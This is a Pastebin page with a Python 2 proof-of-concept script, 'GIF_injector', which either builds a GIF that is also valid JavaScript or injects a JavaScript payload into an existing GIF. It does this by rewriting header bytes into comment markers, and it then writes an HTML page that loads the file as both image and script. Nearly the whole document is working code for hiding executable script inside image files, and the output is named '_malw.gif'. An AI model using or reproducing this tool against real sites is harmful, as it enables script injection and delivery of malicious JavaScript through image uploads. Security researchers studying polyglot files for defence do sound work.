Guest User

GIF_injector

a guest
Jan 5th, 2014
22,849
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. #============================================================================================================#
  3. #======= Simply injects a JavaScript Payload into a GIF. ====================================================#
  4. #======= or it creates a JavaScript Payload as a GIF.    ====================================================#
  5. #======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
  6. #======= Author: marcoramilli.blogspot.com ==================================================================#
  7. #======= Version: PoC (don't even think to use it in development env.) ======================================#
  8. #======= Disclaimer: ========================================================================================#
  9. #THIS IS NOT PEP3 FORMATTED
  10. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
  11. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  12. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  13. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  14. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  15. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  16.                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  17.                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  18. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  19. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  20. #POSSIBILITY OF SUCH DAMAGE.
  21. #===========================================================================================================#
  22. import argparse
  23. import os
  24.  
  25.  
  26. #---------------------------------------------------------
  27. def _hexify(num):
  28.     """
  29.     Converts and formats to hexadecimal
  30.     """
  31.     num = "%x" % num
  32.     if len(num) % 2:
  33.         num = '0'+num
  34.     return num.decode('hex')
  35.  
  36.  
  37. #---------------------------------------------------------
  38. def _generate_and_write_to_file(payload, fname):
  39.     """
  40.    Generates a fake but valid GIF within scriting
  41.    """
  42.     f = open(fname, "wb")
  43.     header = (b'\x47\x49\x46\x38\x39\x61'  #Signature + Version  GIF89a
  44.                         b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width
  45.                         b'\x0A\x00' #Smal Logical Screen Height
  46.                         b'\x00' #GCTF
  47.                         b'\xFF' #BackgroundColor
  48.                         b'\x00' #Pixel Ratio
  49.                         b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks
  50.                         b'\x2A\x2F' #Commenting out */
  51.                         b'\x3D\x31\x3B' # enable the script side by introducing =1;
  52.                         )
  53.     trailer = b'\x3B'
  54.     # I made this explicit, step by step .
  55.     f.write(header)
  56.     f.write(payload)
  57.     f.write(trailer)
  58.     f.close()
  59.     return True
  60.  
  61.  
  62. #---------------------------------------------------------
  63. def _generate_launching_page(f):
  64.     """
  65.     Creates the HTML launching page
  66.     """
  67.     htmlpage ="""
  68.                                 <html>
  69.                                 <head><title>Opening an image</title> </head>
  70.                                 <body>
  71.                                     <img src=\"""" + f + """_malw.gif\"\>
  72.                                     <script src= \"""" + f + """_malw.gif\"> </script>
  73.                                 </body>
  74.                                 </html>
  75.               """
  76.     html = open("run.html", "wb")
  77.     html.write(htmlpage);
  78.     html.close()
  79.     return True
  80.  
  81.  
  82. #---------------------------------------------------------
  83. def _inject_into_file(payload, fname):
  84.     """
  85.     Injects the payload into existing GIF
  86.     NOTE: if the GIF contains \xFF\x2A and/or \x2A\x5C might caouse issues
  87.     """
  88.     # I know, I can do it all in memory and much more fast.
  89.     # I wont do it here.
  90.     with open(fname + "_malw.gif", "w+b") as fout:
  91.         with open(fname, "rt") as fin:
  92.             for line in fin:
  93.                 ls1 = line.replace(b'\x2A\x2F', b'\x00\x00')
  94.                 ls2 = ls1.replace(b'\x2F\x2A', b'\x00\x00')            
  95.                 fout.write(ls2)                
  96.         fout.seek(6,0)
  97.         fout.write(b'\x2F\x2A') #/*
  98.  
  99.     f = open(fname + "_malw.gif", "a+b") #appending mode
  100.     f.write(b'\x2A\x2F\x3D\x31\x3B')
  101.     f.write(payload)
  102.     f.write(b'\x3B')
  103.     f.close()
  104.     return True
  105.  
  106.  
  107. #---------------------------------------------------------
  108. if __name__ == "__main__":
  109.     parser = argparse.ArgumentParser()
  110.     parser.add_argument("filename",help="the gif file name to be generated/or infected")
  111.     parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
  112.     parser.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif")
  113.     args = parser.parse_args()
  114.     print("""
  115.                     |======================================================================================================|
  116.                     | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
  117.                     | It is the end user's responsibility to obey all applicable local, state and federal laws.            |
  118.                     | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
  119.                     |======================================================================================================|
  120.                     """
  121.          )
  122.     if args.inject_to_existing_gif:
  123.          _inject_into_file(args.js_payload, args.filename)
  124.     else:
  125.         _generate_and_write_to_file(args.js_payload, args.filename)
  126.  
  127.     _generate_launching_page(args.filename)
  128.     print "[+] Finished!"
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×